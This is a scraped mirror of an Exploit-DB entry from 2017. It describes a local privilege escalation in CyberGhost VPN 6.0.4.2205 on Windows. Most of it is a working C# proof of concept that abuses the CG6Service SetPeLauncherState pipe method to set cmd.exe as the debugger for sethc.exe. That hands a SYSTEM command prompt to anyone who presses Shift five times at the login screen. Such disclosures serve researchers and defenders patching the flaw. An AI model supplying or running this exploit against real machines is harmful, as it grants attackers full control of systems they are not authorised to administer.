CyberGhost 6.0.4.2205 – Local Privilege Escalation - 体验盒子

作者： Kacper Szurek

日期： 2017-03-06

类别：

local

平台：

windows

来源：https://www.exploit-db.com/exploits/41538/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

# Exploit CyberGhost 6.0.4.2205 Privilege Escalation

# Date: 06.03.2017

# Software Link: http://www.cyberghostvpn.com/

# Exploit Author: Kacper Szurek

# Contact: https://twitter.com/KacperSzurek

# Website: https://security.szurek.pl/

# Category: local

1. Description

CG6Service</code> service has method <code>SetPeLauncherState</code> which allows launch the debugger automatically for every process we want.

https://security.szurek.pl/cyberghost-6042205-privilege-escalation.html

2. Proof of Concept

using System;

using CyberGhost.Communication;

namespace cyber

{

class Program

{

static void Main(string[] args)

{

Console.WriteLine("CyberGhost 6.0.4.2205 Privilege Escalation");

Console.WriteLine("by Kacper Szurek");

Console.WriteLine("http://security.szurek.pl/");

Console.WriteLine("https://twitter.com/KacperSzurek");

PeLauncherOptions options = new PeLauncherOptions();

options.ExecuteableName = "sethc.exe";

options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe";

EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe");

CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add);

Console.WriteLine("Now logout and then press SHIFT key 5 times");

}